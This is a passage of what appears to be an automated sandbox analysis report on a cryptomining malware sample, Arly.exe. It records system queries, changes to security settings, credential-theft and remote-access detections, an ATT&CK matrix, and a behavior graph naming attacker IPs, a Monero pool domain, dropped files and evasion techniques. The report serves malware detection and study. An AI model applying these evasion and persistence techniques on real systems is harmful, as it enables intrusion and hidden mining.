                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeQueries volume information: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exeCode function: 37_2_00007FF7C95DD610 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,37_2_00007FF7C95DD610
                              Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                              Source: wxrctnzmvurnezy.exeBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
                              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                              Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 28.0.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000000.1447558358.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe, type: DROPPED
                              Source: Yara matchFile source: 28.0.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000000.1447558358.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe, type: DROPPED
                              Source: Yara matchFile source: 00000021.00000003.1922191310.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000003D.00000003.1927761556.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000003.1927673653.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000003D.00000002.1998616236.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 28.0.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000000.1447558358.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: 28.0.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000000.1447558358.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe, type: DROPPED
                              Source: Yara matchFile source: 28.0.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 28.2.wxrctnzmvurnezy.exe.7ff7af8d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001C.00000000.1447558358.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe, type: DROPPED
                              Source: Yara matchFile source: 00000021.00000003.1922191310.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000003D.00000003.1927761556.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000021.00000003.1927673653.0000000002530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000003D.00000002.1998616236.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                              Windows Management Instrumentation
                              1
                              Scheduled Task/Job
                              111
                              Process Injection
                              1
                              Masquerading
                              OS Credential Dumping1
                              System Time Discovery
                              Remote Services1
                              Archive Collected Data
                              11
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts12
                              Command and Scripting Interpreter
                              1
                              DLL Side-Loading
                              1
                              Scheduled Task/Job
                              211
                              Disable or Modify Tools
                              LSASS Memory66
                              Security Software Discovery
                              Remote Desktop ProtocolData from Removable Media11
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Scheduled Task/Job
                              Logon Script (Windows)1
                              Abuse Elevation Control Mechanism
                              171
                              Virtualization/Sandbox Evasion
                              Security Account Manager2
                              Process Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive11
                              Ingress Tool Transfer
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                              DLL Side-Loading
                              111
                              Process Injection
                              NTDS171
                              Virtualization/Sandbox Evasion
                              Distributed Component Object ModelInput Capture2
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Abuse Elevation Control Mechanism
                              LSA Secrets1
                              Application Window Discovery
                              SSHKeylogging13
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                              Obfuscated Files or Information
                              Cached Domain Credentials1
                              System Network Configuration Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                              Software Packing
                              DCSync135
                              System Information Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Timestomp
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              DLL Side-Loading
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635427 Sample: Arly.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 92 xmr-eu1.nanopool.org 2->92 94 raw.githubusercontent.com 2->94 96 2 other IPs or domains 2->96 112 Sigma detected: Xmrig 2->112 114 Suricata IDS alerts for network traffic 2->114 116 Malicious sample detected (through community Yara rule) 2->116 120 13 other signatures 2->120 10 Arly.exe 4 2->10         started        15 svchost.exe 2->15         started        17 RtkAudUService64a.exe 2->17         started        19 9 other processes 2->19 signatures3 118 DNS related to crypt mining pools 92->118 process4 dnsIp5 100 5.252.153.122, 3000, 49720 WORLDSTREAMNL Russian Federation 10->100 102 138.124.55.36, 49722, 49724, 49729 NOKIA-ASFI Norway 10->102 104 185.170.153.104, 3000, 49719 NODE4-ASGB United Kingdom 10->104 84 C:\Users\user\AppData\...\wxrctnzmvurnezy.exe, PE32+ 10->84 dropped 86 C:\Users\user\AppData\...\vwytuyiwrmnucib.exe, PE32 10->86 dropped 88 C:\Users\user\AppData\...\bctuwcvcqvnxbyc.exe, PE32 10->88 dropped 90 C:\Users\user\AppData\...\uqqqtttivubuibr.exe, PE32+ 10->90 dropped 148 Adds a directory exclusion to Windows Defender 10->148 21 vwytuyiwrmnucib.exe 10->21         started        24 uqqqtttivubuibr.exe 10->24         started        27 wxrctnzmvurnezy.exe 10->27         started        38 7 other processes 10->38 150 Changes security center settings (notifications, updates, antivirus, firewall) 15->150 30 MpCmdRun.exe 15->30         started        106 163.172.154.142 OnlineSASFR United Kingdom 17->106 152 Query firmware table information (likely to detect VMs) 17->152 32 conhost.exe 17->32         started        34 conhost.exe 19->34         started        36 WerFault.exe 19->36         started        file6 signatures7 process8 dnsIp9 122 Antivirus detection for dropped file 21->122 124 Query firmware table information (likely to detect VMs) 21->124 126 Switches to a custom stack to bypass stack traces 21->126 128 Tries to detect sandboxes / dynamic malware analysis system (registry check) 21->128 40 svchost.exe 21->40         started        80 C:\ProgramData\...\RuntimeBroker.exe, PE32+ 24->80 dropped 130 Multi AV Scanner detection for dropped file 24->130 44 powershell.exe 24->44         started        54 3 other processes 24->54 108 raw.githubusercontent.com 185.199.109.133, 443, 49723, 49725 FASTLYUS Netherlands 27->108 110 api.ipify.org 104.26.13.205, 443, 49726 CLOUDFLARENETUS United States 27->110 132 Queries temperature or sensor information (via WMI often done to detect virtual machines) 27->132 134 Found direct / indirect Syscall (likely to bypass EDR) 27->134 56 2 other processes 27->56 46 conhost.exe 30->46         started        82 C:\Users\user\...\MicrosoftEdgeUpdate.exe, PE32 38->82 dropped 136 Adds a directory exclusion to Windows Defender 38->136 48 cmd.exe 38->48         started        50 powershell.exe 23 38->50         started        52 powershell.exe 11 38->52         started        58 13 other processes 38->58 file10 signatures11 process12 dnsIp13 98 185.236.26.111, 5968, 60013 SOLTIAES Spain 40->98 138 System process connects to network (likely due to code injection or exploit) 40->138 140 Switches to a custom stack to bypass stack traces 40->140 60 fontdrvhost.exe 40->60         started        142 Queries memory information (via WMI often done to detect virtual machines) 44->142 62 conhost.exe 44->62         started        144 Uses schtasks.exe or at.exe to add and modify task schedules 48->144 72 2 other processes 48->72 146 Loading BitLocker PowerShell 